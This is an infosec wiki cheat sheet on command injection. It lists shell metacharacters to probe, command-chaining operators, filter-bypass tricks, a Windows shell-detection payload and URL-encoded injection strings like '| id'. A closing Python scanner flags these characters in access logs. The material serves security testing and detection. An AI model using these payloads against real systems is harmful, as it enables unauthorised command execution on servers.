akde/infosec

Information security is ultimately about managing risk


See also the encoding post for encoding methods.

  • Try to determine which characters are allowed by adding them one by one.
    "
    '
    ;
    &
    |
    >
    `
    \
    (
    )
    #
    {
    }
    [
    ]
  • Try the following to chain multiple commands into one bash command.
    |
    &
    >
    ;
  • Especially for XSS, try these:
    '
    "
    {
    }
    ;
    <
    >

Tips

  • Try to redirect STDERR to see what goes wrong.
  • If only one command is possible, try to add && or || … to add another command.
  • If unsure whether the injection works and there is no output, try side channels:
    • Timing: Try something like wait and see if the response is delayed accordingly.
    • ICMP: Try to ping yourself and capture the ICMP packets with tcpdump.
    • Curl/wget: Open a listener and try to request something from yourself.
  • If you can inject on Windows and want to know whether CMD or PS is used, try to inject this:
    (dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
    Or, URL-encoded:
    (dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell

Bypassing filters

  • Use uninitialized variables. Languages like PHP (and the shell) return an empty string for them in string contexts.
    pa$isswd
  • Add empty strings
    pa""sswd
  • Add comments (for the right language!) like
    pa/**/sswd
  • Resources
    • https://www.exploit-db.com/papers/17934

Linux / PHP

All URL-encoded values below start with a space character (%20).

| id
%20%7c%20%69%64

|| id
%20%7c%7c%20%69%64

& id
%20%26%20%69%64

&& id
%20%26%26%20%69%64

<?php print "1"" ?>
%20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e

;id
%20%3b%69%64
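Read from the defensive side, the character list at the top of the page and the encoded payloads above are exactly what a detection rule should look for after decoding. The following Python example is added here and is not code from the original page: it extracts query parameters from constructed access-log lines (the IPs, endpoint and timestamps are made up), percent-decodes them until stable so a double-encoded value is seen the way the application's own decoder would see it, and flags any value containing one of the metacharacters listed on this page (plus $ from the uninitialized-variable bypass).

```python
import re
from urllib.parse import unquote

# Shell metacharacters from the cheat sheet above, plus '$' from the
# pa$isswd bypass; any of them in a decoded parameter value is worth alerting on.
SHELL_METACHARS = set('"\';&|>`\\()#{}[]<$')

# Constructed sample log lines (not real traffic), with the query string
# still URL-encoded as a web server would log it.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ping?host=example.com HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?host=example.com%20%7c%20%69%64 HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /ping?host=example.com%20%26%26%20%69%64 HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /ping?host=example.com%2520%3b%69%64 HTTP/1.1" 200 512
10.0.0.3 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=O%27Reilly HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')

def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing, so a double-encoded
    payload (%2520 -> %20 -> ' ') is inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(path):
    """Return [(param, decoded_value, metachars_found)] for one request path."""
    if "?" not in path:
        return []
    hits = []
    # Split on the literal '&' first: an encoded %26 stays inside its own pair.
    for pair in path.split("?", 1)[1].split("&"):
        name, _, raw = pair.partition("=")
        decoded = fully_decode(raw)
        found = sorted(SHELL_METACHARS & set(decoded))
        if found:
            hits.append((name, decoded, found))
    return hits

def scan_log(text):
    """Return (client_ip, param, decoded_value, metachars) for each flagged request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        for name, decoded, found in suspicious_params(m.group("path")):
            findings.append((ip, name, decoded, "".join(found)))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The last sample line is deliberate: O'Reilly is flagged because the apostrophe is in the list, so in practice the character set is tuned per parameter (a search box legitimately carries quotes; a hostname parameter never needs them), and a hit on a parameter that is later passed to a shell weighs far more than one on free text.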

Sources

  • https://github.com/xsscx/Commodity-Injection-Signatures
